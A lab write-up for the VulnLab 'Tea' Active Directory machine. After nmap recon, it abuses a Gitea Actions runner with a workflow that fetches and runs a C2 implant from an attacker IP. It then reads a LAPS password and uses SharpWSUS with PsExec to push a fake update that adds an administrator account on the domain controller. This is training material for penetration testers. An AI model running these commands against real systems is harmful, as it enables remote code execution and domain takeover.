VulnLab Tea
VulnLab Tea
Tea
Recon
1
2
3
4
└─$ rustscan -g -a 10.10.146.5,10.10.146.6 -r 1-65535
10.10.146.5 -> [53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389]
10.10.146.6 -> [80,135,445,3000,3389,8530,8531]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 10.10.146.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:57 +05
Nmap scan report for 10.10.146.5
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 14:55:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Not valid before: 2025-01-12T14:50:15
|_Not valid after: 2025-07-14T14:50:15
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: DC.tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-13T14:56:07+00:00
|_ssl-date: 2025-01-13T14:56:47+00:00; -1m19s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-13T14:56:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.04 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
└─$ nmap -sC -sV -p80,135,445,3000,3389,8530,8531 10.10.146.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:57 +05
Nmap scan report for 10.10.146.6
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=e8d2f1daa9dae0be; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=wQ_xo8hdadnr5xzyHTM9xAEE8Iw6MTczNjc4MDYzMTU0MzE0MzgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Jan 2025 15:03:51 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL3Nydi50ZWEudmw6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL3Nydi50ZWEudmw6MzAwMC9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpemVzIjo
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=37a0a600af87f74e; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=rabI2L2S62rhZ6gBzbxNDW9skNo6MTczNjc4MDYzNzA4MTMzOTkwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Jan 2025 15:03:57 GMT
|_ Content-Length: 0
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-13T14:57:32+00:00; -1m20s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: SRV
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: SRV.tea.vl
| DNS_Tree_Name: tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-13T14:56:53+00:00
| ssl-cert: Subject: commonName=SRV.tea.vl
| Not valid before: 2025-01-12T14:50:04
|_Not valid after: 2025-07-14T14:50:04
8530/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
8531/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-13T14:56:57
|_ start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.32 seconds
SRV.tea.vl
We have Gitea
running on port 3000
We can register new account. There’s no public repositories, but in the settings we find available runner
It means that we can create a repo and use runner to execute commands. Create job file .gitea/workflows/demo.yaml
1
2
3
4
5
6
7
8
9
10
11
name: Gitea Actions Demo
run-name: $ is testing out Gitea Actions
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: echo "The job was automatically triggered by a $ event."
- run: powershell -c "wget http://10.8.4.147/demon.exe -outfile c:/Windows/Tasks/demon.exe"
- run: powershell -c "Start-Process c:/Windows/Tasks/demon.exe"
- run: echo "This job's status is $."
Enable actions
Commit and push changes. After few minutes, we receive the connection
We can run bloodhound to view domain info. We see that SRV
has LAPS enabled and thomas.wallace
is a member of Server Administration
group
We can try reading LAPS password and it works
It because, the group has read privileges
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\ProgramData> $SID = (Get-DomainGroup -Identity "Server Administration").objectsid
PS C:\ProgramData> Get-DomainObjectAcl -Identity SRV -ResolveGuids | ?{$_.SecurityIdentifier -eq $SID}
<SNIP>
AceQualifier : AccessAllowed
ObjectDN : CN=SRV,OU=Servers,DC=tea,DC=vl
ActiveDirectoryRights : ReadProperty, ExtendedRight
ObjectAceType : ms-LAPS-Password
ObjectSID : S-1-5-21-4071478895-3826761629-2568933575-1103
<SNIP>
By running RunasCs
, we can get admin beacon
DC.tea.vl
There’s also WSUS-Updates
directory, indicating that there could be WSUS service running
If we run SharpWSUS.exe inspect
, we see that SRV is WSUS server
Let’s escalate privileges, we already have PsExec.exe
in C:\_install
directory since WSUS is restricted to executing only Microsoft-signed binaries.
Run the following payload (we can also use WSUSpendu)
1
SharpWSUS.exe create /payload:"C:\_install\PSExec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user pentest Password123! /add && net localgroup administrators pentest /add\\"" /title:"NewAccountUpdate"
Then approve it with
1
SharpWSUS.exe approve /updateid:<ID> /computername:dc.tea.vl /groupname:"FastUpdates"
So let’s do it
It will probably fail, so we need to run
1
Get-WinEvent -LogName Application | Where-Object { $_.Id -eq 364 } |fl
Looks like we need to copy PSExec
to C:\WSUS-Updates\WsusContent\02\0098C79E1404B4399BF0E686D88DBF052269A302.exe
Now, repeat the steps (only change titles). Unfortunately, it wasn’t possible to run it from Havoc during the lab due to the fact that arguments were truncated, so SharpWSUS
was ran from RDP
. Better run commands one by one (add user, then add user to group).
1
2
3
└─$ nxc smb 10.10.146.5 -u pentest -p 'Password123!'
SMB 10.10.146.5 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.146.5 445 DC [+] tea.vl\pentest:Password123! (Pwn3d!)
https://api.vulnlab.com/api/v1/share?id=07ced564-951e-4e75-9d90-58d43be1fdbf